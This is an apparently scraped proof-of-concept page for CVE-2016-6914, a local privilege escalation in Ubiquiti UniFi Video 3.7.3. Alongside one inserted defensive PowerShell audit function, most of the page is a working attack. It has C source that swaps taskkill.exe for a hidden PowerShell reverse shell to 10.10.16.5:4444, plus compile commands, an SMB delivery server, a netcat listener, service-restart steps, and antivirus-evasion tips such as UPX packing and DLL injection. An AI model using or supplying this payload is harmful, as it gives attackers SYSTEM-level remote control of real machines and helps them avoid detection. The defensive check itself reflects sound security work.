Related vulnerability
Description
CVE-2016-6914-UniFiVideo-LPE
Introduction
# CVE-2016-6914 - Ubiquiti UniFi Video 3.7.3 LPE PoC
## 🔥 Overview
This repository contains a **proof-of-concept (PoC)** for **CVE-2016-6914**, a **Local Privilege Escalation (LPE)** vulnerability affecting **Ubiquiti UniFi Video 3.7.3**.
An attacker with **low privileges** can replace a **trusted binary** (`taskkill.exe`) inside `C:\ProgramData\unifi-video\` to execute **malicious code with SYSTEM privileges**.
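The precondition the PoC relies on is a directory under `C:\ProgramData` that low-privileged users can write to while a SYSTEM service executes a binary from it. The following PowerShell function is an added defensive check, not code from this repository or from Ubiquiti: it reports which low-privileged principals hold write/delete/re-ACL rights on the install directory and on `taskkill.exe`, whether the bundled `taskkill.exe` still carries a valid Authenticode signature, and which account the service runs as. It assumes the install path and the service name `UnifiVideoService` exactly as the README gives them, and it assumes the bundled `taskkill.exe` is a stock copy of the Windows one (so the System32 hash comparison is only a hint, not proof).

```powershell
# Added defensive check; not part of the CVE-2016-6914 PoC repository.
# Assumptions (taken from the README, not verified here): install dir
# C:\ProgramData\unifi-video, bundled binary taskkill.exe, service UnifiVideoService.
function Test-UniFiVideoTaskkillExposure {
    [CmdletBinding()]
    param(
        [string]$InstallDir  = 'C:\ProgramData\unifi-video',
        [string]$ServiceName = 'UnifiVideoService'
    )

    $binary    = Join-Path $InstallDir 'taskkill.exe'
    $reference = Join-Path $env:SystemRoot 'System32\taskkill.exe'

    # Rights that let a principal overwrite, delete-and-replace, or re-ACL a file.
    $dangerous = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
    # GENERIC_WRITE / GENERIC_ALL: Get-Acl shows these as raw numbers on some inherited ACEs.
    $genericBits = 0x40000000 -bor 0x10000000
    # Groups every local user belongs to; an Allow ACE for them is what the file swap needs.
    $lowPriv = 'BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

    $writable = foreach ($path in @($InstallDir, $binary)) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
            $bits = [int]$ace.FileSystemRights
            if (($bits -band [int]$dangerous) -or ($bits -band $genericBits)) {
                [pscustomobject]@{
                    Path      = $path
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }

    # Has the bundled taskkill.exe already been swapped? The Authenticode status is the
    # primary signal; the System32 hash match is a hint only (assumes a stock copy is shipped).
    $binaryState = if (Test-Path -LiteralPath $binary) {
        $sig = Get-AuthenticodeSignature -FilePath $binary
        [pscustomobject]@{
            Exists          = $true
            SignatureStatus = $sig.Status
            Signer          = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
            MatchesSystem32 = (Test-Path -LiteralPath $reference) -and
                              ((Get-FileHash -LiteralPath $binary).Hash -eq (Get-FileHash -LiteralPath $reference).Hash)
        }
    } else {
        [pscustomobject]@{ Exists = $false; SignatureStatus = $null; Signer = $null; MatchesSystem32 = $false }
    }

    # Which account runs the service? LocalSystem is what turns a file swap into an LPE.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'" -ErrorAction SilentlyContinue

    [pscustomobject]@{
        InstallDir        = $InstallDir
        ServiceAccount    = $svc.StartName
        ServiceBinaryPath = $svc.PathName
        WritableByLowPriv = @($writable)
        Binary            = $binaryState
        AtRisk            = (@($writable).Count -gt 0) -and ($svc.StartName -eq 'LocalSystem')
    }
}

# Example usage (run from an elevated prompt so every ACL can be read):
$result = Test-UniFiVideoTaskkillExposure
$result | Format-List
$result.WritableByLowPriv | Format-Table -AutoSize
```

`AtRisk` is true when a low-privileged group can replace the binary and the service runs as LocalSystem, which is the exact condition the PoC exploits; the fix is to remove write rights for those groups from the directory (leaving Administrators and SYSTEM) and to move off the affected 3.7.3 build. A `SignatureStatus` other than `Valid`, or a signer that is not Microsoft, means the file may already have been replaced and should be handled as an incident. For ongoing detection, file-creation auditing (for example Sysmon event ID 11) scoped to this directory catches the swap at the moment it happens rather than on the next scan.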
---
## ⚡ Exploitation
### **Steps to Exploit**
1️⃣ Replace `taskkill.exe` with a **malicious payload** (`exploit.exe`).
2️⃣ Wait for **UniFi Video Service** to run or manually restart it.
3️⃣ The **malicious payload executes**, giving a **SYSTEM shell**.
---
## 🚀 Payloads Included
- ✅ **PowerShell Reverse Shell**
- ✅ **Netcat Reverse Shell**
- ✅ **AV Bypass Techniques**
---
## 📜 PoC Code (PowerShell Reverse Shell)
This payload replaces `taskkill.exe` and launches a **reverse shell**.
```c
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Stand-in for taskkill.exe: when the UniFi Video service invokes it as SYSTEM,
   this launches the PowerShell reverse shell to the listener address below. */
int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}
```

✅ Compile using MinGW:

```shell
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
```
---
## 🛠️ Usage Instructions
### 1️⃣ Set Up SMB Share (for Remote File Delivery)
On Kali, run:

```shell
impacket-smbserver share . -smb2support
```

### 2️⃣ Start Netcat Listener

```shell
nc -lvnp 4444
```

### 3️⃣ Deliver Payload to Target Machine
Run the following PowerShell commands on the target system:

```powershell
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService
```

### 4️⃣ Get SYSTEM Shell
Once executed, a SYSTEM shell is opened on your listener!
---
## 🛡️ Bypassing Antivirus (AV)
To evade basic AV detection, try:
- ✔️ Packing the executable (UPX):
  ```shell
  upx --best --lzma exploit.exe
  ```
- ✔️ Using alternative syscalls instead of `system()`.
- ✔️ Embedding in legitimate processes using DLL injection.
---
## ⚠️ Disclaimer
- 📢 This PoC is for educational purposes only!
- 🛑 Unauthorized use is illegal and punishable.
- 👨‍💻 Use it only in a legal and ethical manner.

Reference: https://www.exploit-db.com/exploits/43390
File snapshot

```
[4.0K] /data/pocs/157d840a131abd2b63a60c7d9a8026b0596f63a6
├── [ 600] exploit.c
├── [111K] exploit.exe
└── [2.5K] README.md
0 directories, 3 files
```
Notes
1. Access via the original source is recommended.
2. If the source has gone offline or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.